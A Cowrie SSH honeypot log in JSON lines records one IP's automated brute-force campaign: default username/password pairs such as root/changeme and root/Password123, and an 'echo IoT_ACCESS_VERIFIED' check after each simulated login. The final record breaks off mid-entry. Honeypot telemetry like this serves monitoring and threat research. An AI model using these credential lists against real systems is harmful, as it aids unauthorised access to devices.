{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:52.135324Z","src_ip":"212.227.125.160","session":"bf96013a7125"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:53.277157Z","src_ip":"212.227.125.160","session":"bf96013a7125"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:54.491972Z","src_ip":"212.227.125.160","session":"bf96013a7125"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38874,"dst_ip":"1.2.3.4","dst_port":22,"session":"8efbfe1973e0","protocol":"ssh","message":"New connection: 212.227.125.160:38874 (1.2.3.4:22) [session: 8efbfe1973e0]","sensor":"my-vps","timestamp":"2025-09-09T02:57:54.560743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:54.727893Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:54.729802Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123","message":"login attempt [root/Password123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.163918Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:55.329229Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.329941Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.372893Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.373954Z","src_ip":"212.227.125.160","session":"8efbfe1973e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44630,"dst_ip":"1.2.3.4","dst_port":22,"session":"e037d64bcca9","protocol":"ssh","message":"New connection: 212.227.125.160:44630 (1.2.3.4:22) [session: e037d64bcca9]","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.415194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.416062Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.459921Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme","message":"login attempt [root/changeme] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.794268Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:57:55.914510Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.915278Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.964315Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:55.965761Z","src_ip":"212.227.125.160","session":"e037d64bcca9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47836,"dst_ip":"1.2.3.4","dst_port":22,"session":"a13069bfdfeb","protocol":"ssh","message":"New connection: 212.227.125.160:47836 (1.2.3.4:22) [session: a13069bfdfeb]","sensor":"my-vps","timestamp":"2025-09-09T02:57:56.007927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:56.008870Z","src_ip":"212.227.125.160","session":"a13069bfdfeb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:56.051314Z","src_ip":"212.227.125.160","session":"a13069bfdfeb"}
{"eventid":"cowrie.login.failed","username":"ssh","password":"ssh","message":"login attempt [ssh/ssh] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:56.190107Z","src_ip":"212.227.125.160","session":"a13069bfdfeb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:57.265420Z","src_ip":"212.227.125.160","session":"a13069bfdfeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55356,"dst_ip":"1.2.3.4","dst_port":22,"session":"f89064d1a99a","protocol":"ssh","message":"New connection: 212.227.125.160:55356 (1.2.3.4:22) [session: f89064d1a99a]","sensor":"my-vps","timestamp":"2025-09-09T02:57:57.307929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:57.327924Z","src_ip":"212.227.125.160","session":"f89064d1a99a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:57.350188Z","src_ip":"212.227.125.160","session":"f89064d1a99a"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-09-09T02:57:57.521062Z","src_ip":"212.227.125.160","session":"f89064d1a99a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:57:59.285703Z","src_ip":"212.227.125.160","session":"f89064d1a99a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38106,"dst_ip":"1.2.3.4","dst_port":22,"session":"47df1e34ae4f","protocol":"ssh","message":"New connection: 212.227.125.160:38106 (1.2.3.4:22) [session: 47df1e34ae4f]","sensor":"my-vps","timestamp":"2025-09-09T02:57:59.327070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:57:59.615617Z","src_ip":"212.227.125.160","session":"47df1e34ae4f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:57:59.616312Z","src_ip":"212.227.125.160","session":"47df1e34ae4f"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-09-09T02:58:01.268772Z","src_ip":"212.227.125.160","session":"47df1e34ae4f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:02.619327Z","src_ip":"212.227.125.160","session":"47df1e34ae4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51970,"dst_ip":"1.2.3.4","dst_port":22,"session":"c69faf416409","protocol":"ssh","message":"New connection: 212.227.125.160:51970 (1.2.3.4:22) [session: c69faf416409]","sensor":"my-vps","timestamp":"2025-09-09T02:58:02.675605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:58:02.905037Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:58:02.905778Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.login.success","username":"root","password":"hacked","message":"login attempt [root/hacked] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:58:03.509774Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:58:04.076594Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:58:04.077604Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:04.163585Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:04.164904Z","src_ip":"212.227.125.160","session":"c69faf416409"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58218,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff8befe1407b","protocol":"ssh","message":"New connection: 212.227.125.160:58218 (1.2.3.4:22) [session: ff8befe1407b]","sensor":"my-vps","timestamp":"2025-09-09T02:58:04.233648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:58:04.302869Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T02:58:04.303608Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.login.success","username":"root","password":"scanner","message":"login attempt [root/scanner] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.256541Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:58:05.519147Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.520013Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.603821Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.605237Z","src_ip":"212.227.125.160","session":"ff8befe1407b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36848,"dst_ip":"1.2.3.4","dst_port":22,"session":"5948940233e1","protocol":"ssh","message":"New connection: 212.227.125.160:36848 (1.2.3.4:22) [session: 5948940233e1]","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.646343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T02:58:05.707377Z","src_ip":"212.227.125.160","session":"5948940233e1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 